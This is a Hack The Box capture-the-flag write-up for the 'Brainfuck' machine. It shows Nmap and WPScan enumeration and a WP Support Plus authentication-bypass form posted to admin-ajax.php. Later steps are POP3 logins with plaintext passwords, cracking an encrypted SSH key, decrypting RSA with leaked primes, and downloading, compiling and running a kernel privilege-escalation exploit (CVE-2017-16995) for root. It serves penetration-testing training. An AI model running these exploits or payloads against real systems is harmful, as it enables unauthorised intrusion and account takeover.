Hack The Box: Brainfuck Write-up (#6)
Let’s begin with recon.
Reconnaissance
Start with basic Nmap scan.
nmap -sC -sV -O -oA nmap/basic 10.10.10.17
- -sC: Default Nmap script
- -sV: Service/version info
- -O: Enable OS detection
- -oA: Output scan results in 3 different formats
We get the back the following results:
- Port 22: — Running OpenSSH 7.2p2 Ubuntu 4ubuntu2.1
- Port 25: — Running Postfix smtpd
- Port 110: — Running Dovecot pop3d
- Port 143: — Running Dovecot imapd
- Port 443: — Running Nginx 1.10.0 (Ubuntu)
Next, run a full Nmap scan.
nmap -sC -sV -O -p- -oA nmap/full 10.10.10.17
- -p-: Scan all ports from 1–65535
The result I get back is the same as basic Nmap scan. No other ports are open. Similarly, run a UDP scan.
nmap -sU -O -p- -oA nmap/udp 10.10.10.17
- -sU: UDP Scan
We get back the following results.
No other ports are open.
A quick summary before we begin with service enumeration.
- The SSH version is not vulnerable in Ubuntu 16.04 LTS Xenial Xerus. If we found any vulnerabilities, the exploits probably will not work for this Ubuntu OS version. It has been patched. Refer here.
- Port 443 is running HTTPS. We need to check the SSL certificate for info and then we also need to add DNS hostnames (found during Nmap scan) into our /etc/hosts file to map DNS name to this host IP. Otherwise, we cant reach web pages.
- Port 25, 110 and 143 are mail protocols. Normally we need credentials to access to the mail service.
Service Enumeration
Port 443 (HTTPS web service)
Append the following hostnames into /etc/hosts and save it.
10.10.10.17 sup3rs3cr3t.brainfuck.htb
10.10.10.17 www.brainfuck.htb brainfuck.htb
Next, we access to brainfuck.htb.
This web server hosting the WordPress web application. Let’s enumerate with WPscan.
WordPress Web Application Enumeration
wpscan --url https://brainfuck.htb/ --disable-tls-checks -e ap at vp cb
We get back the following results:
Search for an exploit with keyword “wordress plus responsive” gives the following results:
root@kali:~# searchsploit wordpress plus responsive
----------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
----------------------------------------------------------------------------- ---------------------------------
WordPress Plugin WP Support Plus Responsive Ticket System 2.0 - Multiple Vul | php/webapps/34589.txt
WordPress Plugin WP Support Plus Responsive Ticket System 7.1.3 - Privilege | php/webapps/41006.txt
WordPress Plugin WP Support Plus Responsive Ticket System 7.1.3 - SQL Inject | php/webapps/40939.txt
----------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Papers: No Results
Exploit number 2 (php/webapps/41006.txt) seems promising. Read through the code reveals this code can escalate privilege to any given username.
...SNIP...
1. DescriptionYou can login as anyone without knowing password because of incorrect usage of wp_set_auth_cookie().http://security.szurek.pl/wp-support-plus-responsive-ticket-system-713-privilege-escalation.html2. Proof of Concept<form method="post" action="http://wp/wp-admin/admin-ajax.php">
Username: <input type="text" name="username" value="administrator">
<input type="hidden" name="email" value="sth">
<input type="hidden" name="action" value="loginGuestFacebook">
<input type="submit" value="Login">
</form>
WordPress Web Application Exploitation
We need to do a little modification to the exploit code. The path provided in the action attribute needs to modify. We need to provide the exact path of the file admin-ajax.php as below.
root@kali:/htb/Brainfuck# cat poc.html
<form method="post" action="https://https://brainfuck.htb/wp-admin/admin-ajax.php">
Username: <input type="text" name="username" value="administrator">
<input type="hidden" name="email" value="sth">
<input type="hidden" name="action" value="loginGuestFacebook">
<input type="submit" value="Login">
</form>
Now save the file in the current directory. I named this file as poc.html. Next, set a python simple web server in the same directory as this poc.html file and access to this directory from Kali browser.
root@kali:/htb/Brainfuck# python3 -m http.server 8000
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
Click the file and enter admin in the username field and click Login.
Leave this tab to remain open. Open a new tab and visit https://brainfuck.htb. Refresh the page and you will see your login as admin.
WordPress Web Application Post-Enumeration
Go the admin dashboard and click on Settings and then click Easy WP SMTP.
We have a credential for user orestis and the password is masked. We can view the plain text password by right click in the password field and then click Inspect Element as below.
This credential we can use to access the mailbox of the user orestis.
Port 110 POP3d service
Let’s access to this service using Netcat and enter discovered orestis credential.
root@kali:/htb/Brainfuck# nc 10.10.10.17 110
+OK Dovecot ready.
USER orestis
+OK
PASS kHGuERB29DNiNE
+OK Logged in.
List the inbox messages. We found another set of credential for user orestis to access a forum called “secret”.
root@kali:/htb/Brainfuck# nc 10.10.10.17 110
+OK Dovecot ready.
USER orestis
+OK
PASS kHGuERB29DNiNE
+OK Logged in.
LIST
+OK 2 messages:
1 977
2 514
.
RETR 2
+OK 514 octets
Return-Path: <root@brainfuck.htb>
X-Original-To: orestis
Delivered-To: orestis@brainfuck.htb
Received: by brainfuck (Postfix, from userid 0)
id 4227420AEB; Sat, 29 Apr 2017 13:12:06 +0300 (EEST)
To: orestis@brainfuck.htb
Subject: Forum Access Details
Message-Id: <20170429101206.4227420AEB@brainfuck>
Date: Sat, 29 Apr 2017 13:12:06 +0300 (EEST)
From: root@brainfuck.htb (root)Hi there, your credentials for our "secret" forum are below :)username: orestis
password: kIEnnfEKJ#9UmdORegards
Port 443 Targetting sup3rs3cr3t.brainfuck.htb
We already know that there is another URL for this host exist and it sounds like “secret”. Let’s access to this URL sup3rs3cr3t.brainfuck.htb
Click login and enter the new set of credentials.
After enumerated this page, I found that SSH access to this server using password permanently disabled but we can use SSH key to authenticate.
Also, I noticed a few things as I pointed in the above picture. Every time user Orestis posts a comment, his signature always same “Orestis — Hacking for fun and profit”. Orestis also posted, asked admin to share the SSH key in an encrypted chat. If you go to “Key” page you will see the page as below with encrypted text.
After little observation, I come to know certain information from the encrypted chat. The signature length of orestis is same in the encrypted chats. Also, the URL starts with HTTPS protocol and end with id_rsa, because this is about SSH key.
Orestis - Hacking for fun and profit << Plaintext
Pieagnm - Jkoijeg nbw zwx mle grwsnn << cipher text
Wejmvse - Fbtkqal zqb rso rnl cwihsf << cipher text
Qbqquzs - Pnhekxs dpi fca fhf zdmgzt << cipher textmnvze://10.10.10.17/8zb5ra10m915218697q1h658wfoq0zc8/frmfycu/sp_ptr
https://10.10.10.17/......................................../id_rsa
Now we need to find out the correct cipher method. With the help of online decipher, I had pasted above ciphertext inside message textbox and plaintext inside pad textbox and received key text “BrainfuCkmybrainfuckmybrainfu”. The link can be found here http://rumkin.com/tools/cipher/otp.php
If we re-arrange the key text, it is actually “fuckmybrain”. To decipher the URL, I found Vigenére Ciphers is a correct method. So here is the decipher URL:
https://10.10.10.17/8ba5aa10e915218697d1c658cdee0bb8/orestis/id_rsa
Accessing the URL prompted us to save the private rsa key file.
Let’s save the key file. If we looking at the content of the key file it is encrypted “Proc-Type: 4 Encrypted”.
root@kali:/htb/Brainfuck# cat id_rsa
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,6904FEF19397786F75BE2D7762AE7382mneag/YCY8AB+OLdrgtyKqnrdTHwmpWGTNW9pfhHsNz8CfGdAxgchUaHeoTj/rh/
B2nS4+9CYBK8IR3Vt5Fo7PoWBCjAAwWYlx+cK0w1DXqa3A+BLlsSI0Kws9jea6Gi
W1ma/V7WoJJ+V4JNI7ufThQyOEUO76PlYNRM9UEF8MANQmJK37Md9Ezu53wJpUqZ
7dKcg6AM/o9VhOlpiX7SINT9dRKaKevOjopRbyEFMliP01H7ZlahWPdRRmfCXSmQ
zxH9I2lGIQTtRRA3rFktLpNedNPuZQCSswUec7eVVt2mc2Zv9PM9lCTJuRSzzVum
oz3XEnhaGmP1jmMoVBWiD+2RrnL6wnz9kssV+tgCV0mD97WS+1ydWEPeCph06Mem
dLR2L1uvBGJev8i9hP3thp1owvM8HgidyfMC2vOBvXbcAA3bDKvR4jsz2obf5AF+
Fvt6pmMuix8hbipP112Us54yTv/hyC+M5g1hWUuj5y4xovgr0LLfI2pGe+Fv5lXT
mcznc1ZqDY5lrlmWzTvsW7h7rm9LKgEiHn9gGgqiOlRKn5FUl+DlfaAMHWiYUKYs
LSMVvDI6w88gZb102KD2k4NV0P6OdXICJAMEa1mSOk/LS/mLO4e0N3wEX+NtgVbq
ul9guSlobasIX5DkAcY+ER3j+/YefpyEnYs+/tfTT1oM+BR3TVSlJcOrvNmrIy59
krKVtulxAejVQzxImWOUDYC947TXu9BAsh0MLoKtpIRL3Hcbu+vi9L5nn5LkhO/V
gdMyOyATor7Amu2xb93OO55XKkB1liw2rlWg6sBpXM1WUgoMQW50Keo6O0jzeGfA
VwmM72XbaugmhKW25q/46/yL4VMKuDyHL5Hc+Ov5v3bQ908p+Urf04dpvj9SjBzn
schqozogcC1UfJcCm6cl+967GFBa3rD5YDp3x2xyIV9SQdwGvH0ZIcp0dKKkMVZt
UX8hTqv1ROR4Ck8G1zM6Wc4QqH6DUqGi3tr7nYwy7wx1JJ6WRhpyWdL+su8f96Kn
F7gwZLtVP87d8R3uAERZnxFO9MuOZU2+PEnDXdSCSMv3qX9FvPYY3OPKbsxiAy+M
wZezLNip80XmcVJwGUYsdn+iB/UPMddX12J30YUbtw/R34TQiRFUhWLTFrmOaLab
Iql5L+0JEbeZ9O56DaXFqP3gXhMx8xBKUQax2exoTreoxCI57axBQBqThEg/HTCy
IQPmHW36mxtc+IlMDExdLHWD7mnNuIdShiAR6bXYYSM3E725fzLE1MFu45VkHDiF
mxy9EVQ+v49kg4yFwUNPPbsOppKc7gJWpS1Y/i+rDKg8ZNV3TIb5TAqIqQRgZqpP
CvfPRpmLURQnvly89XX97JGJRSGJhbACqUMZnfwFpxZ8aPsVwsoXRyuub43a7GtF
9DiyCbhGuF2zYcmKjR5EOOT7HsgqQIcAOMIW55q2FJpqH1+PU8eIfFzkhUY0qoGS
EBFkZuCPyujYOTyvQZewyd+ax73HOI7ZHoy8CxDkjSbIXyALyAa7Ip3agdtOPnmi
6hD+jxvbpxFg8igdtZlh9PsfIgkNZK8RqnPymAPCyvRm8c7vZFH4SwQgD5FXTwGQ
-----END RSA PRIVATE KEY-----
We can decrypt this rsa private key with the help of John the Ripper or we just call it john (the famous term). First, we need to convert this encrypted key file into john format using ssh2john tool and save the output to a file. In this case, I named it as id_rsa.txt.
root@kali:/htb/Brainfuck# python /usr/share/john/ssh2john.py id_rsa > ida_rsa.txt
root@kali:/htb/Brainfuck# cat ida_rsa.txt
id_rsa:$sshng$1$16$6904FEF19397786F75BE2D7762AE7382$1200$9a779a83f60263c001f8e2ddae0b722aa9eb7531f09a95864cd5bda5f847b0dcfc09f19d03181c8546877a84e3feb87f0769d2e3ef426012bc211dd5b79168ecfa160428c0030598971f9c2b4c350d7a9adc0f812e5b122342b0b3d8de6ba1a25b599afd5ed6a0927e57824d23bb9f4e143238450eefa3e560d44cf54105f0c00d42624adfb31df44ceee77c09a54a99edd29c83a00cfe8f5584e969897ed220d4fd75129a29ebce8e8a516f210532588fd351fb6656a158f7514667c25d2990cf11fd2369462104ed451037ac592d2e935e74d3ee650092b3051e73b79556dda673666ff4f33d9424c9b914b3cd5ba6a33dd712785a1a63f58e63285415a20fed91ae72fac27cfd92cb15fad802574983f7b592fb5c9d5843de0a9874e8c7a674b4762f5baf04625ebfc8bd84fded869d68c2f33c1e089dc9f302daf381bd76dc000ddb0cabd1e23b33da86dfe4017e16fb7aa6632e8b1f216e2a4fd75d94b39e324effe1c82f8ce60d61594ba3e72e31a2f82bd0b2df236a467be16fe655d399cce773566a0d8e65ae5996cd3bec5bb87bae6f4b2a01221e7f601a0aa23a544a9f915497e0e57da00c1d689850a62c2d2315bc323ac3cf2065bd74d8a0f6938355d0fe8e7572022403046b59923a4fcb4bf98b3b87b4377c045fe36d8156eaba5f60b929686dab085f90e401c63e111de3fbf61e7e9c849d8b3efed7d34f5a0cf814774d54a525c3abbcd9ab232e7d92b295b6e97101e8d5433c489963940d80bde3b4d7bbd040b21d0c2e82ada4844bdc771bbbebe2f4be679f92e484efd581d3323b2013a2bec09aedb16fddce3b9e572a4075962c36ae55a0eac0695ccd56520a0c416e7429ea3a3b48f37867c057098cef65db6ae82684a5b6e6aff8ebfc8be1530ab83c872f91dcf8ebf9bf76d0f74f29f94adfd38769be3f528c1ce7b1c86aa33a20702d547c97029ba725fbdebb18505adeb0f9603a77c76c72215f5241dc06bc7d1921ca7474a2a431566d517f214eabf544e4780a4f06d7333a59ce10a87e8352a1a2dedafb9d8c32ef0c75249e96461a7259d2feb2ef1ff7a2a717b83064bb553fceddf11dee0044599f114ef4cb8e654dbe3c49c35dd48248cbf7a97f45bcf618dce3ca6ecc62032f8cc197b32cd8a9f345e671527019462c767fa207f50f31d757d76277d1851bb70fd1df84d08911548562d316b98e68b69b22a9792fed0911b799f4ee7a0da5c5a8fde05e1331f3104a5106b1d9ec684eb7a8c42239edac41401a9384483f1d30b22103e61d6dfa9b1b5cf8894c0c4c5d2c7583ee69cdb88752862011e9b5d861233713bdb97f32c4d4c16ee395641c38859b1cbd11543ebf8f64838c85c1434f3dbb0ea6929cee0256a52d58fe2fab0ca83c64d5774c86f94c0a88a9046066aa4f0af7cf46998b511427be5cbcf575fdec918945218985b002a943199dfc05a7167c68fb15c2ca17472bae6f8ddaec6b45f438b209b846b85db361c98a8d1e4438e4fb1ec82a40870038c216e79ab6149a6a1f5f8f53c7887c5ce4854634aa819210116466e08fcae8d8393caf4197b0c9df9ac7bdc7388ed91e8cbc0b10e48d26c85f200bc806bb229dda81db4e3e79a2ea10fe8f1bdba71160f2281db59961f4fb1f22090d64af11aa73f29803c2caf466f1ceef6451f84b04200f91574f0190
Let’s crack the password with john.
root@kali:/htb/Brainfuck# john --wordlist=/usr/share/wordlists/rockyou.txt id_rsa.txt
We got the password! Now we have the rsa key file (id_rsa and not the id_rsa.txt) and passphrase. One last thing before we access the target via SSH, we need to change the file permission of the id_rsa key file to 600 else we will have permission issue when accessing to the target.
root@kali:/htb/Brainfuck# chmod 600 id_rsa
Exploitation or Just Login
Let’s access to target now.
root@kali:/htb/Brainfuck# ssh -i id_rsa orestis@10.10.10.17
When prompt to enter a passphrase, enter the password “3poulakia!”.
Great! we got access to the target system. Let’s read the content of the user.txt file.
Now we proceed for post enumeration to escalate our privilege to root user.
Post-Exploitation Enumeration
After checked all the contents of the file listed under orestis home directory, this one particular file explaining that what it does.
orestis@brainfuck:~$ cat encrypt.sage
nbits = 1024password = open("/root/root.txt").read().strip()
enc_pass = open("output.txt","w")
debug = open("debug.txt","w")
m = Integer(int(password.encode('hex'),16))p = random_prime(2^floor(nbits/2)-1, lbound=2^floor(nbits/2-1), proof=False)
q = random_prime(2^floor(nbits/2)-1, lbound=2^floor(nbits/2-1), proof=False)
n = p*q
phi = (p-1)*(q-1)
e = ZZ.random_element(phi)
while gcd(e, phi) != 1:
e = ZZ.random_element(phi)c = pow(m, e, n)
enc_pass.write('Encrypted Password: '+str(c)+'\n')
debug.write(str(p)+'\n')
debug.write(str(q)+'\n')
debug.write(str(e)+'\n')
This script takes the value of p,q and n then it creates value for e. After that, it uses these values p,q and e to write into debug file.
orestis@brainfuck:~$ cat debug.txt
7493025776465062819629921475535241674460826792785520881387158343265274170009282504884941039852933109163193651830303308312565580445669284847225535166520307
7020854527787566735458858381555452648322845008266612906844847937070333480373963284146649074252278753696897245898433245929775591091774274652021374143174079
30802007917952508422792869021689193927485016332713622527025219105154254472344627284947779726280995431947454292782426313255523137610532323813714483639434257536830062768286377920010841850346837238015571464755074669373110411870331706974573498912126641409821855678581804467608824177508976254759319210955977053997
Google search for “decrypt RSA p q e” gave me this GitHub link. You can see the parameters look same as in encrypt.sage but it prepends with 0x. But we don’t have to. Because I tried and the result was gibberish.
We copy the values of p,q and e from debug.txt file and replace in the code. For the value of ct (encrypted password), we can be found in the output.txt file. So put all together, our updated final code looks like this:
...SNIP...p = 7493025776465062819629921475535241674460826792785520881387158343265274170009282504884941039852933109163193651830303308312565580445669284847225535166520307
q = 7020854527787566735458858381555452648322845008266612906844847937070333480373963284146649074252278753696897245898433245929775591091774274652021374143174079
e = 30802007917952508422792869021689193927485016332713622527025219105154254472344627284947779726280995431947454292782426313255523137610532323813714483639434257536830062768286377920010841850346837238015571464755074669373110411870331706974573498912126641409821855678581804467608824177508976254759319210955977053997
ct = 44641914821074071930297814589851746700593470770417111804648920018396305246956127337150936081144106405284134845851392541080862652386840869768622438038690803472550278042463029816028777378141217023336710545449512973950591755053735796799773369044083673911035030605581144977552865771395578778515514288930832915182...SNIP...
Now let’s execute the code with python.
We got the root.txt flag. Great!
Privilege Escalation
I have gathered OS and kernel information in the enumeration phase.
orestis@brainfuck:/tmp$ uname -a
Linux brainfuck 4.4.0-75-generic #96-Ubuntu SMP Thu Apr 20 09:56:33 UTC 2017 x86_64 x86_64 x86_64 GNU/Linuxorestis@brainfuck:/tmp$ cat /etc/*release
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=16.04
DISTRIB_CODENAME=xenial
DISTRIB_DESCRIPTION="Ubuntu 16.04.2 LTS"
NAME="Ubuntu"
VERSION="16.04.2 LTS (Xenial Xerus)"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 16.04.2 LTS"
VERSION_ID="16.04"
HOME_URL="http://www.ubuntu.com/"
SUPPORT_URL="http://help.ubuntu.com/"
BUG_REPORT_URL="http://bugs.launchpad.net/ubuntu/"
VERSION_CODENAME=xenial
UBUNTU_CODENAME=xenial
For privilege escalation, I used an awesome tool called linux-exploit-suggester-2 recommended by Tib3rius to search for kernel exploits. After running the script I get back the following result.
root@kali:/opt/linux-exploit-suggester-2# ./linux-exploit-suggester-2.pl -k 4.4.0#############################
Linux Exploit Suggester 2
#############################Local Kernel: 4.4.0
Searching 72 exploits...Possible Exploits
[1] af_packet
CVE-2016-8655
Source: http://www.exploit-db.com/exploits/40871
[2] dirty_cow
CVE-2016-5195
Source: http://www.exploit-db.com/exploits/40616
[3] exploit_x
CVE-2018-14665
Source: http://www.exploit-db.com/exploits/45697
[4] get_rekt
CVE-2017-16695
Source: http://www.exploit-db.com/exploits/45010
After reading through all the exploits code, the number [4] exploit works for me. The code is fairly straightforward.
...SNIP...
Tested on Ubuntu 16.04 with the following Kernels
4.4.0-31-generic
4.4.0-62-generic
4.4.0-81-generic
4.4.0-116-generic
4.8.0-58-generic
4.10.0.42-generic
4.13.0-21-genericTested on Fedora 27
4.13.9-300
gcc cve-2017-16995.c -o cve-2017-16995
internet@client:~/cve-2017-16995$ ./cve-2017-16995
[.]
[.] t(-_-t) exploit for counterfeit grsec kernels such as KSPP and linux-hardened t(-_-t)
[.]
[.] ** This vulnerability cannot be exploited at all on authentic grsecurity kernel **
[.]
[*] creating bpf map
[*] sneaking evil bpf past the verifier
[*] creating socketpair()
[*] attaching bpf backdoor to socket
[*] skbuff => ffff880038c3f500
[*] Leaking sock struct from ffff88003af5e180
[*] Sock->sk_rcvtimeo at offset 472
[*] Cred structure at ffff880038704600
[*] UID from cred structure: 1000, matches the current: 1000
[*] hammering cred structure at ffff880038704600
[*] credentials patched, launching shell...
#id
uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare),1000(internet)
...SNIP...
Download the exploit code from searchsploit in Kali using below command.
root@kali:/htb/Brainfuck# searchsploit -m 45010
Rename the code as exploit.c and transfer the code to the target using python simple webserver. I downloaded under /tmp directory.
orestis@brainfuck:/tmp$ wget http://10.10.14.12/exploit.c
--2020-08-08 08:01:22-- http://10.10.14.12/exploit.c
Connecting to 10.10.14.12:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 13728 (13K) [text/plain]
Saving to: ‘exploit.c’exploit.c 100%[=============================================================>] 13.41K 49.3KB/s in 0.3s2020-08-08 08:01:22 (49.3 KB/s) - ‘exploit.c’ saved [13728/13728]
Now we compile the code with gcc as mentioned in the exploit code.
orestis@brainfuck:/tmp$ gcc exploit.c -o exploitorestis@brainfuck:/tmp$ ll
total 140
drwxrwxrwt 10 root root 4096 Aug 8 08:01 ./
drwxr-xr-x 23 root root 4096 Apr 29 2017 ../
-rwxrwxr-x 1 orestis orestis 18432 Aug 8 08:01 exploit*
The code compiled without any error. Great! Let execute the exploit.
orestis@brainfuck:/tmp$ ./exploit
[.]
[.] t(-_-t) exploit for counterfeit grsec kernels such as KSPP and linux-hardened t(-_-t)
[.]
[.] ** This vulnerability cannot be exploited at all on authentic grsecurity kernel **
[.]
[*] creating bpf map
[*] sneaking evil bpf past the verifier
[*] creating socketpair()
[*] attaching bpf backdoor to socket
[*] skbuff => ffff88003ca28400
[*] Leaking sock struct from ffff88003ac2ec00
[*] Sock->sk_rcvtimeo at offset 472
[*] Cred structure at ffff88003bd4a780
[*] UID from cred structure: 1000, matches the current: 1000
[*] hammering cred structure at ffff88003bd4a780
[*] credentials patched, launching shell...
# id
uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),30(dip),46(plugdev),110(lxd),121(lpadmin),122(sambashare),1000(orestis)
#
We rooted!
Attack Strategy Map
Thank you for reading :-) Next box is Cronos.